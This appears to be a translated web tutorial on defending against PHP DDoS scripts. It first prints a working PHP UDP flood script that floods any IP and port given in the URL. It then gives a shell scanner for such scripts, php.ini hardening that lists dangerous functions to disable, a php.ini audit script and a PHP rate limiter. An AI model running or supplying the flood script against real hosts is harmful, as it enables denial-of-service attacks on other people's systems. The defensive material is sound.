Several methods of defending against PHP DDoS scripts, explained in detail

Source: Internet
Author: User

Let's look at the PHP DDoS code first.

The code is as follows:

$packets = 0;
$ip = $_get[' IP '];
$rand = $_get[' Port '];
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[' time '];
$time = time ();
Print "flooded: $ip on port $rand
";
$max _time = $time + $exec _time;

For ($i =0 $i <65535; $i + +) {
$out. = "X";
}
while (1) {
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = fsockopen("udp://$ip", $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}
echo "Packet complete at". Time (' h:i:s '). "With $packets (". Round (($packets *65)/1024, 2). "MB) packets averaging". Round ($packets/$exec _time, 2). "PACKETS/S n";
?>

Careful readers will notice that fsockopen is the key function in the attack: the script opens connections and sends data continuously, which drives up the machine's traffic and CPU usage until the site can no longer be accessed normally.
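To find scripts of this kind that have already been planted on a server, the web root can be searched for the two traits described above. The following is an added example, not code from the original page; the patterns are taken from the script quoted above, and the sample directory tree and file names are constructed.

```shell
#!/bin/sh
# Added example: flag PHP files that show the flood script's traits.
# Patterns come from the script quoted on this page; the sample tree is constructed.
# PHP function names are case-insensitive, so every match uses grep -i.
P_UDP='fsockopen[[:space:]]*\([[:space:]]*.udp://'                    # UDP socket via fsockopen
P_NOLIMIT='set_time_limit[[:space:]]*\([[:space:]]*0[[:space:]]*\)'   # time limit removed

# Print "HIGH <file>" (both traits) or "REVIEW <file>" (UDP socket only), sorted.
scan_php_flood() {  # scan_php_flood <dir>
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php5' \) |
    while IFS= read -r file; do
        if grep -Eiq -e "$P_UDP" "$file"; then
            if grep -Eiq -e "$P_NOLIMIT" "$file"; then
                echo "HIGH $file"
            else
                echo "REVIEW $file"
            fi
        fi
    done | sort
}

# Constructed sample tree: indicator lines only, no working script.
ROOT=$(mktemp -d)
mkdir -p "$ROOT/uploads"
cat > "$ROOT/uploads/avatar.php" <<'EOF'
<?php
Set_Time_Limit (0);
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
EOF
cat > "$ROOT/uploads/probe.phtml" <<'EOF'
<?php $fp = fsockopen( 'udp://192.0.2.10', 53);
EOF
cat > "$ROOT/uploads/export.php" <<'EOF'
<?php set_time_limit(0); // long-running report, no sockets
EOF

scan_php_flood "$ROOT"
```

A file that only removes the time limit, like the constructed export.php, is not reported, because long-running legitimate scripts do the same.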

After a brief study of how PHP DDoS scripts are built, here are some of the better ways to guard against them:

Note: The following operations carry risk. Any consequences have nothing to do with Pride Tour, so please operate carefully.

1. Open php.ini

2. Disable dangerous functions

Different programs need different functions, so customers should edit the list of functions to disable according to their own needs.

Find disable_functions, remove the ";" in front of it, and add the following after the equals sign:

The code is as follows:

phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,proc_get_status,fsocket,fsockopen

3. Set the PHP execution timeout

If a program has not finished executing when the maximum execution time is reached, it is forcibly stopped; adjust the time as needed.

Find max_execution_time, remove the ";" in front of it, and add a positive integer after the equals sign, in seconds, for example: 30

4. Disable PHP execute permission in upload directories

Servers broadly fall into three kinds: IIS, Apache, and Nginx. The specific steps are not written out here; the following link is provided for reference:

How to remove script execution permission from a directory on IIS and Apache: http://www.111cn.net/sys/Windows/46232.htm

5. A very drastic approach

Prohibit PHP execution outright. Many sites can generate static web pages, so PHP execute permission is turned on manually each time pages are generated or the site is administered. A few users already use this method; for the specific steps, see method 4.

6. Close the User Center

CMSs such as Dede have a User Center with many places to upload files, and this is probably where the problem lies.

7. Change the admin directory

This method is not described in detail, and it does not apply to all programs.

8. Change the default admin account

Many people are used to the name admin, but if the program is vulnerable, the password of admin is easy to guess, so we recommend changing admin to a different login name.

9. A complex password that you can remember

Whether it is a Windows/Linux system user or a webmaster account, set a password that is hard to guess, such as: 123hai@tang@.
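The php.ini edits in steps 2 and 3 can be checked after the fact with a small audit script. This is an added example, not code from the original page; the WATCH list is an assumption that extends the page's list with other PHP functions that open sockets (pfsockopen, stream_socket_client, socket_create), and both sample files are constructed.

```shell
#!/bin/sh
# Added example (not from the page): audit a php.ini for steps 2 and 3.
# WATCH is an assumed review list; trim it to what your application needs.
WATCH="fsockopen pfsockopen stream_socket_client socket_create exec system shell_exec passthru popen proc_open"

# Print the effective value of a directive: the last uncommented assignment wins.
ini_value() {  # ini_value <file> <directive>
    awk -v key="$2" '
        /^[ \t]*;/ || !index($0, "=") { next }     # comment lines and lines without "="
        {
            k = substr($0, 1, index($0, "=") - 1); gsub(/[ \t]/, "", k)
            if (k != key) next
            v = substr($0, index($0, "=") + 1)
            sub(/;.*$/, "", v); gsub(/[ \t\r"]/, "", v)   # trailing comment, blanks, quotes
            val = v
        }
        END { print val }' "$1"
}

# Print each watched function that disable_functions does not cover.
not_disabled() {  # not_disabled <file>
    list=",$(ini_value "$1" disable_functions | tr 'A-Z' 'a-z'),"
    for fn in $WATCH; do
        case "$list" in *",$fn,"*) ;; *) echo "$fn" ;; esac
    done
}

# Succeed only when max_execution_time is a positive integer (0 means no limit).
exec_time_limited() {  # exec_time_limited <file>
    t=$(ini_value "$1" max_execution_time)
    case "$t" in ''|*[!0-9]*) return 1 ;; esac
    [ "$t" -gt 0 ]
}

# Constructed samples: an unedited-style php.ini and one edited as in steps 2 and 3.
TMP=$(mktemp -d)
printf '%s\n' ';disable_functions =' 'disable_functions =' 'max_execution_time = 0' > "$TMP/weak.ini"
printf '%s\n' 'disable_functions = phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,proc_get_status,fsocket,fsockopen' \
    'max_execution_time = 30   ; seconds' > "$TMP/hardened.ini"

for name in weak hardened; do
    echo "== $name.ini"
    not_disabled "$TMP/$name.ini" | sed 's/^/  still callable: /'
    if exec_time_limited "$TMP/$name.ini"; then echo "  execution time limited"; else echo "  no execution time limit"; fi
done
```

Run against the list from step 2, the script still reports pfsockopen, stream_socket_client and socket_create as callable, so a site that needs none of them should add them to disable_functions as well.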

Finally, here is a piece of PHP anti-DDoS code.

The code is as follows:

<?php
// Check whether this IP is already banned
$ip = $_SERVER['REMOTE_ADDR'];
$fileht = ".htaccess2";
if (!file_exists($fileht)) file_put_contents($fileht, "");
$filehtarr = @file($fileht) ?: [];   // file() returns false on failure
if (in_array($ip . "\r\n", $filehtarr)) die("Warning:" . "<br>" . "Your IP address is forbidden for some reason. If you have any questions, please email shop@mydalle.com!");

// Add the IP to the ban list
$time = time();
$fileforbid = "Log/forbidchk.dat";
if (file_exists($fileforbid)) {
    if ($time - filemtime($fileforbid) > 60) unlink($fileforbid);
    else {
        $fileforbidarr = @file($fileforbid);
        // Compare the whole stored address; a prefix match would also hit 1.2.3.40 for 1.2.3.4
        if (is_array($fileforbidarr) && count($fileforbidarr) >= 3 && $ip === rtrim($fileforbidarr[0])) {
            if ($time - (int)$fileforbidarr[1] > 600) unlink($fileforbid);
            elseif ((int)$fileforbidarr[2] > 600) { file_put_contents($fileht, $ip . "\r\n", FILE_APPEND | LOCK_EX); unlink($fileforbid); }
            else { $fileforbidarr[2] = (int)$fileforbidarr[2] + 1; file_put_contents($fileforbid, $fileforbidarr, LOCK_EX); }
        }
    }
}

// Anti-refresh
$str = "";
$file = "Log/ipdate.dat";
if (!file_exists("Log") && !is_dir("Log")) mkdir("Log", 0755);   // not world-writable
if (!file_exists($file)) file_put_contents($file, "");
$allowTime = 120; // anti-refresh window, in seconds
$allowNum = 10;   // anti-refresh count: requests allowed within the window
$uri = $_SERVER['REQUEST_URI'];
$checkip = md5($ip);
$checkuri = md5($uri);
$yesno = true;
$ipdate = @file($file) ?: [];
// Each record: md5(ip) (32 chars) + md5(uri) (32 chars) + timestamp (10 chars) + counter
foreach ($ipdate as $k => $v) {
    $iptem = substr($v, 0, 32);
    $uritem = substr($v, 32, 32);
    $timetem = (int)substr($v, 64, 10);
    $numtem = (int)substr($v, 74);
    if ($time - $timetem < $allowTime) {
        // Strict comparison: loose != treats hashes such as "0e12..." as equal numbers
        if ($iptem !== $checkip) $str .= $v;
        else {
            $yesno = false;
            if ($uritem !== $checkuri) $str .= $iptem . $checkuri . $time . "1\r\n";
            elseif ($numtem < $allowNum) $str .= $iptem . $uritem . $timetem . ($numtem + 1) . "\r\n";
            else {
                if (!file_exists($fileforbid)) { $addforbidarr = array($ip . "\r\n", time() . "\r\n", 1); file_put_contents($fileforbid, $addforbidarr, LOCK_EX); }
                file_put_contents("Log/forbided_ip.log", $ip . "--" . date("Y-m-d H:i:s", time()) . "--" . $uri . "\r\n", FILE_APPEND | LOCK_EX);
                $timepass = $timetem + $allowTime - $time;
                die("Warning:" . "<br>" . "Sorry, you are forbidden for refreshing too frequently. Please wait " . $timepass . " seconds.");
            }
        }
    }
}
if ($yesno) $str .= $checkip . $checkuri . $time . "1\r\n";
file_put_contents($file, $str, LOCK_EX);
?>

